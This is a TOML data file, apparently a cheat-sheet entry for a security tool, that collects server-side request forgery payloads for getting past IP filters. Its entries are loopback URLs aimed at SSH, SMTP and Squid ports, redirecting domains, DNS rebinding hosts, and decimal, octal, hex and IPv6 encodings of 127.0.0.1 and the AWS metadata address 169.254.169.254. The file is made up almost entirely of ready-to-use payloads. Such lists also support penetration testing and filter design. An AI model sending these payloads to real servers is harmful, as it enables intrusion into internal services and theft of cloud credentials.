title = "SSRF IP filter bypass"
description = "Bypass common IP filters to exploit SSRF"
tags = ["web", "SSRF", "bypass"]
source = ["https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md#bypassing-filters","https://portswigger.net/web-security/ssrf#bypassing-ssrf-filters-via-open-redirection"]

[[data]]
description = "Bypass for localhost access:"
command = """http://localhost:80
http://localhost:443
http://localhost:22
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0000::1]:25/ SMTP
http://[0000::1]:22/ SSH
http://[0000::1]:3128/ Squid"""

[[data]]
description = "Bypass with domain redirect:"
command = """
localtest.me redirects to ::1
localh.st redirects to 127.0.0.1
spoofed.[BURP_COLLABORATOR] redirects to 127.0.0.1
spoofed.redacted.oastify.com redirects to 127.0.0.1
company.127.0.0.1.nip.io redirects to 127.0.0.1
make-127.0.0.i-rr.1u.ms redirects to 127.0.0.1
make-127-0-0-1-rr.1u.ms redirects to 127.0.0.1
"""

[[data]]
description = "Bypass with decimal IP"
command = """http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254

Convert to decimal: https://www.browserling.com/tools/ip-to-dec"""

[[data]]
description = "Bypass with octal IP"
command = """http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1

Convert to octal: https://www.browserling.com/tools/ip-to-oct"""

[[data]]
description = "Bypass with rare addresses and malformed urls"
command = """localhost:+11211aaa
localhost:00011211aaaa
http://0/
http://127.1
http://127.0.1"""

[[data]]
description = "Bypassing using DNS Rebinding (TOCTOU)"
command = """Create a domain that change between two IPs. http://1u.ms/ exists for this purpose.
For example to rotate between 1.2.3.4 and 169.254-169.254, use the following domain:
make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms"""

[[data]]
description = "Encoding AWS metadata server IP (169.254.169.254) to bypass WAF"
command = """http://425.510.425.510 Dotted decimal with overflow
http://2852039166 Dotless decimal
http://7147006462 Dotless decimal with overflow
http://0xA9.0xFE.0xA9.0xFE Dotted hexadecimal
http://0xA9FEA9FE Dotless hexadecimal
http://0x41414141A9FEA9FE Dotless hexadecimal with overflow
http://0251.0376.0251.0376 Dotted octal
http://0251.00376.000251.0000376 Dotted octal with padding
http://0251.254.169.254 Mixed encoding (dotted octal + dotted decimal)
http://[::ffff:a9fe:a9fe] IPV6 Compressed
http://[0:0:0:0:0:ffff:a9fe:a9fe] IPV6 Expanded
http://[0:0:0:0:0:ffff:169.254.169.254] IPV6/IPV4
http://[fd00:ec2::254] IPV6"""
